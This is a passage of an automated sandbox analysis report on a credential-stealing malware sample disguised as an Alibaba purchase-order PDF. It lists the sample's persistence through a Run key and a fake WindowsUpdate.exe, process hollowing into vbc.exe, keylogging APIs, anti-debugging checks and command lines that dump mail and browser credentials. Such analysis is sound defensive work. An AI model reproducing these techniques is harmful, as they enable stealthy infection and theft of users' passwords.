              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 2_2_004118A0 push eax; ret 2_2_004118B4
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 2_2_004118A0 push eax; ret 2_2_004118DC
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 3_2_00442871 push ecx; ret 3_2_00442881
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 3_2_00442A90 push eax; ret 3_2_00442AA4
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 3_2_00442A90 push eax; ret 3_2_00442ACC
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 3_2_00446E54 push eax; ret 3_2_00446E61
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe Code function: 8_2_00401F16 push ecx; ret 8_2_00401F29
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe Code function: 8_2_00ED1BF6 push ecx; ret 8_2_00ED1C09
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe Code function: 11_2_00401F16 push ecx; ret 11_2_00401F29
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe Code function: 11_2_00ED1BF6 push ecx; ret 11_2_00ED1C09
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exe File created: \po 2010029_pdf quotation from alibaba ale.exe
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exe File created: C:\Users\user\AppData\Roaming\WindowsUpdate.exe
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Windows Update

              Hooking and other Techniques for Hiding and Protection:

              Icon mismatch, binary includes an icon from a different legit application in order to fool users
              Source: initial sample Icon embedded in binary file: icon matches a legit application icon: icon (5001).png
              Changes the view of files in windows explorer (hidden files and folders)
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exe Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced Hidden
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 2_2_0040F64B memset,strcpy,memset,strcpy,strcat,strcpy,strcat,GetModuleHandleA,LoadLibraryExA,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_0040F64B
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exe Process information set: NOGPFAULTERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 3_2_00408836 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,3_2_00408836
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exe Thread delayed: delay time: 922337203685477
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exe Thread delayed: delay time: 1500000
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exe Thread delayed: delay time: 180000
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe Thread delayed: delay time: 922337203685477
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exe TID: 5924 Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exe TID: 6072 Thread sleep time: -120000s >= -30000s
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exe TID: 6004 Thread sleep time: -140000s >= -30000s
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exe TID: 1380 Thread sleep time: -1500000s >= -30000s
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exe TID: 6840 Thread sleep time: -180000s >= -30000s
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe TID: 5780 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe TID: 6360 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exe Code function: 0_2_00404A29 FindFirstFileExW,0_2_00404A29
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exe Code function: 0_2_00B018BD FindFirstFileExA,0_2_00B018BD
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exe Code function: 0_2_00B01BA6 FindFirstFileExW,FindClose,FindNextFileW,0_2_00B01BA6
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 2_2_00406EC3 FindFirstFileA,FindNextFileA,strlen,strlen,2_2_00406EC3
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 3_2_00408441 FindFirstFileW,FindNextFileW,wcslen,wcslen,3_2_00408441
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 3_2_00407E0E FindFirstFileW,FindNextFileW,FindClose,3_2_00407E0E
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe Code function: 8_2_00404A29 FindFirstFileExW,8_2_00404A29
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe Code function: 8_2_00F018BD FindFirstFileExA,8_2_00F018BD
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe Code function: 8_2_00F01BA6 FindFirstFileExW,FindClose,FindNextFileW,8_2_00F01BA6
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe Code function: 8_2_00F01D5C FindFirstFileExW,8_2_00F01D5C
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe Code function: 8_2_00F01D31 FindFirstFileExA,8_2_00F01D31
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe Code function: 11_2_00404A29 FindFirstFileExW,11_2_00404A29
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe Code function: 11_2_00F018BD FindFirstFileExA,11_2_00F018BD
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe Code function: 11_2_00F01BA6 FindFirstFileExW,FindClose,FindNextFileW,11_2_00F01BA6
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_00F01D5C FindFirstFileExW,11_2_00F01D5C
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_00F01D31 FindFirstFileExA,11_2_00F01D31
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 3_2_004161B0 memset,GetSystemInfo,3_2_004161B0
              Source: WindowsUpdate.exe, 0000000B.00000003.301585581.000000000166C000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllW
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.320060762.0000000021310000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.320060762.0000000021310000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.320060762.0000000021310000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.301923048.0000000001677000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllZZ|
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.320060762.0000000021310000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeProcess information queried: ProcessInformation
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeProcess queried: DebugPort
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: 0_2_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0040446F
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 3_2_00408836 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,3_2_00408836
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 2_2_00404837 GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,#17,MessageBoxA,2_2_00404837
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: 0_2_004035F1 mov eax, dword ptr fs:[00000030h]0_2_004035F1
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: 0_2_00B17B00 mov eax, dword ptr fs:[00000030h]0_2_00B17B00
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: 0_2_00AD90B9 mov eax, dword ptr fs:[00000030h]0_2_00AD90B9
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: 0_2_00AD9077 mov eax, dword ptr fs:[00000030h]0_2_00AD9077
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: 0_2_00AF6492 mov eax, dword ptr fs:[00000030h]0_2_00AF6492
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: 0_2_00AF64EE mov eax, dword ptr fs:[00000030h]0_2_00AF64EE
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: 0_2_00AF640A mov eax, dword ptr fs:[00000030h]0_2_00AF640A
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: 0_2_00AF644E mov eax, dword ptr fs:[00000030h]0_2_00AF644E
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: 0_2_00AF65A5 mov eax, dword ptr fs:[00000030h]0_2_00AF65A5
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: 0_2_00AF65EA mov eax, dword ptr fs:[00000030h]0_2_00AF65EA
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: 0_2_00AF662F mov eax, dword ptr fs:[00000030h]0_2_00AF662F
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: 0_2_00AF6662 mov eax, dword ptr fs:[00000030h]0_2_00AF6662
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 8_2_004035F1 mov eax, dword ptr fs:[00000030h]8_2_004035F1
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 8_2_00F17B00 mov eax, dword ptr fs:[00000030h]8_2_00F17B00
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 8_2_00ED90B9 mov eax, dword ptr fs:[00000030h]8_2_00ED90B9
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 8_2_00ED9077 mov eax, dword ptr fs:[00000030h]8_2_00ED9077
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 8_2_00EF64EE mov eax, dword ptr fs:[00000030h]8_2_00EF64EE
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 8_2_00EF6492 mov eax, dword ptr fs:[00000030h]8_2_00EF6492
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 8_2_00EF644E mov eax, dword ptr fs:[00000030h]8_2_00EF644E
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 8_2_00EF640A mov eax, dword ptr fs:[00000030h]8_2_00EF640A
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 8_2_00EF65EA mov eax, dword ptr fs:[00000030h]8_2_00EF65EA
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 8_2_00EF65A5 mov eax, dword ptr fs:[00000030h]8_2_00EF65A5
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 8_2_00EF6662 mov eax, dword ptr fs:[00000030h]8_2_00EF6662
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 8_2_00EF662F mov eax, dword ptr fs:[00000030h]8_2_00EF662F
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_004035F1 mov eax, dword ptr fs:[00000030h]11_2_004035F1
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_00F17B00 mov eax, dword ptr fs:[00000030h]11_2_00F17B00
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_00ED90B9 mov eax, dword ptr fs:[00000030h]11_2_00ED90B9
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_00ED9077 mov eax, dword ptr fs:[00000030h]11_2_00ED9077
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_00EF64EE mov eax, dword ptr fs:[00000030h]11_2_00EF64EE
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_00EF6492 mov eax, dword ptr fs:[00000030h]11_2_00EF6492
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_00EF644E mov eax, dword ptr fs:[00000030h]11_2_00EF644E
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_00EF640A mov eax, dword ptr fs:[00000030h]11_2_00EF640A
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_00EF65EA mov eax, dword ptr fs:[00000030h]11_2_00EF65EA
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_00EF65A5 mov eax, dword ptr fs:[00000030h]11_2_00EF65A5
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_00EF6662 mov eax, dword ptr fs:[00000030h]11_2_00EF6662
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_00EF662F mov eax, dword ptr fs:[00000030h]11_2_00EF662F
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_00F17F90 mov eax, dword ptr fs:[00000030h]11_2_00F17F90
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: 0_2_004067FE GetProcessHeap,0_2_004067FE
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeProcess token adjusted: Debug
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: 0_2_00401E1D SetUnhandledExceptionFilter,0_2_00401E1D
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: 0_2_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0040446F
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: 0_2_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00401C88
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: 0_2_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00401F30
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: 0_2_00AD1AF5 SetUnhandledExceptionFilter,0_2_00AD1AF5
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: 0_2_00AF66D3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00AF66D3
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: 0_2_00AD1963 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00AD1963
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 8_2_00401E1D SetUnhandledExceptionFilter,8_2_00401E1D
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 8_2_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_0040446F
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 8_2_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00401C88
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 8_2_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_00401F30
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 8_2_00ED1AF5 SetUnhandledExceptionFilter,8_2_00ED1AF5
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 8_2_00EF66D3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00EF66D3
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 8_2_00ED1963 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00ED1963
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 8_2_00ED1DDE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_00ED1DDE
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_00401E1D SetUnhandledExceptionFilter,11_2_00401E1D
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_0040446F
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00401C88
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_00401F30
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_00ED1AF5 SetUnhandledExceptionFilter,11_2_00ED1AF5
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_00EF66D3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00EF66D3
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_00ED1963 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00ED1963
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_00ED1DDE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_00ED1DDE
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeMemory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

.NET source code references suspicious native API functions
              Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1efe0000.6.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
              Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1efe0000.6.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
              Source: 8.2.WindowsUpdate.exe.1ad90000.2.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
              Source: 8.2.WindowsUpdate.exe.1ad90000.2.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
              Source: 11.2.WindowsUpdate.exe.1eed0000.5.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
              Source: 11.2.WindowsUpdate.exe.1eed0000.5.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
Allocates memory in foreign processes
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
Writes to foreign memory regions
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 412000
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 416000
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 418000
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 443000
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 44F000
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 452000
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2216
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: 0_2_0040208D cpuid 0_2_0040208D
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00B06054
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: EnumSystemLocalesW,0_2_00AF8376
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: EnumSystemLocalesW,0_2_00AF84D1
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: EnumSystemLocalesW,0_2_00AF8450
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_00B056EB
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: EnumSystemLocalesW,0_2_00B059D7
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: EnumSystemLocalesW,0_2_00B0596E
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: EnumSystemLocalesW,0_2_00B05A72
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,8_2_00F06054
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: EnumSystemLocalesW,8_2_00EF8376
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: EnumSystemLocalesW,8_2_00EF84D1
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,8_2_00F056EB
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: EnumSystemLocalesW,8_2_00F059D7
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: EnumSystemLocalesW,8_2_00F0596E
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: EnumSystemLocalesW,8_2_00F05A72
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,8_2_00F05B00
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: GetLocaleInfoW,8_2_00F05D50
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,8_2_00F05E79
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: GetLocaleInfoW,8_2_00F05F81
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: GetLocaleInfoW,8_2_00EF8F37
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,11_2_00F06054
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: EnumSystemLocalesW,11_2_00EF8376
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: EnumSystemLocalesW,11_2_00EF84D1
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: EnumSystemLocalesW,11_2_00EF8450
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,11_2_00F056EB
